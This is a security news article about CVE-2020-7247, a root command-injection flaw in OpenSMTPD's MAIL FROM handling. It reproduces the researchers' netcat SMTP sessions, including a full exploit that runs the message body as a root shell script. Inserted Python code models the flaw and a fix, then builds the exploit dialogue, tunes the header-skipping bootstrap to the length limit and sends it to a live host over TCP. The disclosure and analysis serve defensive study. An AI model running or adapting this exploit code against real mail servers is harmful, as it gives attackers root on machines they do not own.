Vulnerability in OpenSMTPD allowing remote code execution with root privileges

A critical vulnerability (CVE-2020-7247) has been identified in OpenSMTPD, the mail server developed by the OpenBSD project. It allows shell commands to be executed remotely on the server with the privileges of the root user. The vulnerability was found during a repeat audit by Qualys Security (the previous audit of OpenSMTPD was carried out in 2015; the new vulnerability has existed since May 2018). The problem is fixed in the OpenSMTPD 6.6.2 release. All users are advised to install the update immediately (on OpenBSD the patch can be installed with syspatch).

Two attack scenarios are described. The first works in the default OpenSMTPD configuration (accepting connections from localhost only) and allows the bug to be exploited locally by an attacker who can reach the server's local network interface (loopback), for example on shared hosting systems. The second applies when OpenSMTPD is configured to accept connections from the outside network (a mail server receiving a company's external mail). The researchers prepared a prototype exploit that works both against the OpenSMTPD version shipped with OpenBSD 6.6 and against the portable version for other operating systems (tested on Debian Testing).

The problem is caused by an error in the smtp_mailaddr() function, which is called to validate the values of the "MAIL FROM" and "RCPT TO" fields that define the sender and recipient and are passed during a connection to the mail server. To check the part of the e-mail address before the "@" sign, smtp_mailaddr() calls valid_localpart(), which accepts (MAILADDR_ALLOWED) the characters "!#$%&'*/?^`{|}~+-=_", as required by RFC 5322.

The actual escaping of the string is performed in the mda_expand_token() function, which substitutes only the characters "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). The string prepared by mda_expand_token() is then used when the mail delivery agent (MDA) is invoked through the call 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...'. For delivery to mbox, the command line "/usr/libexec/mail.local -f %{mbox.from} %{username}" is run via /bin/sh, where the "%{mbox.from}" value contains the escaped data from the "MAIL FROM" parameter.

The essence of the vulnerability is a logic error in smtp_mailaddr(): if the domain in the e-mail address is empty, the function returns a successful validation result even when the part of the address before "@" contains invalid characters. In addition, when preparing the string, mda_expand_token() does not escape every shell special character that could be present, but only the special characters that are allowed in an e-mail address. So to run an arbitrary command it is enough to use the ";" character and a space in the local part of the address: neither is in the MAILADDR_ESCAPE set, so neither is escaped. For example:

$ nc 127.0.0.1 25

HELO professor.falken
MAIL FROM:<;sleep 66;>
RCPT TO:<root>
DATA
.
QUIT

After this session, OpenSMTPD, when delivering to mbox, will run the following command through the shell:

/usr/libexec/mail.local -f ;sleep 66; root
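The validation and escaping path described above, modelled in Python as an added example (this is not OpenSMTPD source). valid_localpart() and the MAILADDR_ESCAPE substitution follow the character sets quoted in the article; valid_domainpart() is a simplified stand-in; smtp_mailaddr_vulnerable() follows the described flow, and smtp_mailaddr_fixed() is a hardened form written for this example, not necessarily the exact upstream patch. The 64-character limit and the ':' substitution are taken from the article.

```python
import string

# Character sets quoted in the article from OpenSMTPD's smtpd.h.
MAILADDR_ALLOWED = "!#$%&'*/?^`{|}~+-=_"
MAILADDR_ESCAPE = "!#$%&'*?`{|}~"
MAX_LOCALPART = 64  # limit on the local part of the address, per the article

# Characters that /bin/sh -c treats specially. ';' and ' ' matter here:
# valid_localpart() rejects them, but the escape set never touches them.
SHELL_META = set(";&|<>()$`\\\"' \t\n")

ATEXT = set(string.ascii_letters + string.digits + MAILADDR_ALLOWED)


def valid_localpart(local: str) -> bool:
    """Model of valid_localpart(): dot-separated, non-empty atoms of atext."""
    if not local:
        return False
    return all(atom and all(c in ATEXT for c in atom) for atom in local.split("."))


def valid_domainpart(domain: str) -> bool:
    """Simplified model (assumption): non-empty labels of [A-Za-z0-9-]."""
    if not domain:
        return False
    ok = set(string.ascii_letters + string.digits + "-")
    return all(label and all(c in ok for c in label) for label in domain.split("."))


def smtp_mailaddr_vulnerable(user, domain, mailfrom, local_domain):
    """Pre-6.6.2 flow as the article describes it.

    Returns (accepted, effective_domain). The bug: with an empty domain the
    address is accepted as local without the local part ever being re-checked.
    """
    if valid_localpart(user) and valid_domainpart(domain):
        return True, domain
    if mailfrom and user == "" and domain == "":
        return True, domain          # empty return-path, needed for bounces
    if user == "":
        return False, domain         # no user part: reject
    if domain == "":
        return True, local_domain    # BUG: user is not validated on this path
    return False, domain


def smtp_mailaddr_fixed(user, domain, mailfrom, local_domain):
    """Same flow with the missing check on the empty-domain branch."""
    if valid_localpart(user) and valid_domainpart(domain):
        return True, domain
    if mailfrom and user == "" and domain == "":
        return True, domain
    if user == "":
        return False, domain
    if domain == "" and valid_localpart(user):
        return True, local_domain
    return False, domain


def mda_escape(s: str) -> str:
    """Model of the MAILADDR_ESCAPE substitution: each listed char becomes ':'."""
    return "".join(":" if c in MAILADDR_ESCAPE else c for c in s)


def mbox_mda_command(mbox_from: str, username: str) -> str:
    """The mbox delivery command line the article says is passed to /bin/sh -c."""
    return "/usr/libexec/mail.local -f %s %s" % (mda_escape(mbox_from), username)


def surviving_shell_meta(mbox_from: str) -> set:
    """Shell metacharacters still present after escaping."""
    return {c for c in mda_escape(mbox_from) if c in SHELL_META}


if __name__ == "__main__":
    payload = ";sleep 66;"
    print(valid_localpart(payload))                                   # False
    print(smtp_mailaddr_vulnerable(payload, "", True, "localhost"))   # (True, 'localhost')
    print(smtp_mailaddr_fixed(payload, "", True, "localhost"))        # (False, '')
    print(mbox_mda_command(payload, "root"))  # /usr/libexec/mail.local -f ;sleep 66; root
    print(sorted(surviving_shell_meta(payload)))                      # [' ', ';']
```

Running the module shows the two halves of the bug side by side: the local part ";sleep 66;" fails valid_localpart(), the vulnerable flow accepts it anyway because the domain is empty, and the escape step leaves ';' and the space intact, so the assembled command line is exactly the one shown above.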

The attack is constrained by two things: the local part of the address cannot exceed 64 characters, and the special characters '$' and '|' are replaced with ":" during escaping. To work around this, the exploit relies on the fact that the message body is passed to /usr/libexec/mail.local on standard input once it has been started. In other words, the crafted address only needs to launch the sh command interpreter; the message body then serves as the script. Since the SMTP service headers are placed at the beginning of the message, the read command is used in a loop to skip them. A working exploit looks like this:

$ nc 192.168.56.143 25

HELO professor.falken
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
RCPT TO:<root@localhost>
DATA
#0
#1
...
#d
for i in W O P R; do
        echo -n "($i) " && id || break
done > /root/x."`id -u`.""$$"
.
QUIT
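To make the header-skipping trick concrete, the following added Python example (not the researchers' code) builds the dialogue above from a skip count and a script, enforces the 64-character budget on the local part, and simulates which line sh executes first once the read loop has consumed the lines the server prepends. The header lines are constructed placeholders, and send_session() is an assumption about a minimal SMTP client for live use; neither appears in the article.

```python
import socket

MAX_LOCALPART = 64  # limit on the local part of the address, per the article

# The script the article places in the message body.
SCRIPT = [
    "for i in W O P R; do",
    '        echo -n "($i) " && id || break',
    'done > /root/x."`id -u`.""$$"',
]

# Constructed stand-ins for the header lines the server prepends to the
# delivered message; the real count depends on the server configuration.
SAMPLE_HEADERS = ["Received: (constructed header line %d)" % i for i in range(4)]


def bootstrap_localpart(skip: int) -> str:
    """The MAIL FROM local part: discard `skip` lines of stdin, then run the
    rest with sh. One loop item per line skipped, as a hex digit to save room."""
    items = " ".join("%x" % i for i in range(skip))
    return ";for i in %s;do read r;done;sh;exit 0;" % items


def fits_limit(skip: int) -> bool:
    """True if a bootstrap skipping `skip` lines fits the local-part limit."""
    return len(bootstrap_localpart(skip)) <= MAX_LOCALPART


def exploit_body(skip: int, script_lines) -> list:
    """Body lines: `skip` comment lines of padding, then the script. If the
    server prepends fewer than `skip` header lines, sh starts on a comment
    instead of in the middle of the script."""
    return ["#%x" % i for i in range(skip)] + list(script_lines)


def session_lines(helo, rcpt, skip, script_lines) -> list:
    """The SMTP dialogue of the article as a list of lines."""
    local = bootstrap_localpart(skip)
    if len(local) > MAX_LOCALPART:
        raise ValueError("local part is %d chars, limit is %d"
                         % (len(local), MAX_LOCALPART))
    return (["HELO " + helo,
             "MAIL FROM:<%s>" % local,
             "RCPT TO:<%s>" % rcpt,
             "DATA"]
            + exploit_body(skip, script_lines)
            + [".", "QUIT"])


def first_executed_line(header_lines, body_lines, skip):
    """Simulate sh's view. mail.local's stdin is the delivered message: the
    server's headers, a blank line, then the body. The read loop discards
    `skip` lines; sh then runs the rest, where '#' lines and blanks are no-ops."""
    stream = list(header_lines) + [""] + list(body_lines)
    for line in stream[skip:]:
        if line.strip() and not line.lstrip().startswith("#"):
            return line
    return None


def send_session(host, port, lines, timeout=10):
    """Deliver the dialogue over TCP with CRLF line endings, collecting one
    reply per command (body lines after DATA get no reply). Live use only."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        replies = [f.readline().decode(errors="replace").rstrip()]  # banner
        in_data = False
        for line in lines:
            s.sendall((line + "\r\n").encode())
            if in_data and line != ".":
                continue
            in_data = (line == "DATA")
            replies.append(f.readline().decode(errors="replace").rstrip())
        return replies


if __name__ == "__main__":
    skip = 14
    for line in session_lines("professor.falken", "root@localhost", skip, SCRIPT):
        print(line)
    body = exploit_body(skip, SCRIPT)
    print(first_executed_line(SAMPLE_HEADERS, body, skip))          # the for loop
    print(first_executed_line(["H%d" % i for i in range(20)], body, skip))  # a header
```

With 14 skipped lines the local part is 63 characters, one under the limit; skipping 15 lines pushes it to 65 and session_lines() refuses to build the dialogue. The second simulation, with 20 header lines, shows the failure mode the padding cannot cover: sh would start executing header text, so the skip count has to be at least the number of lines the target server prepends.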

Source: opennet.ru
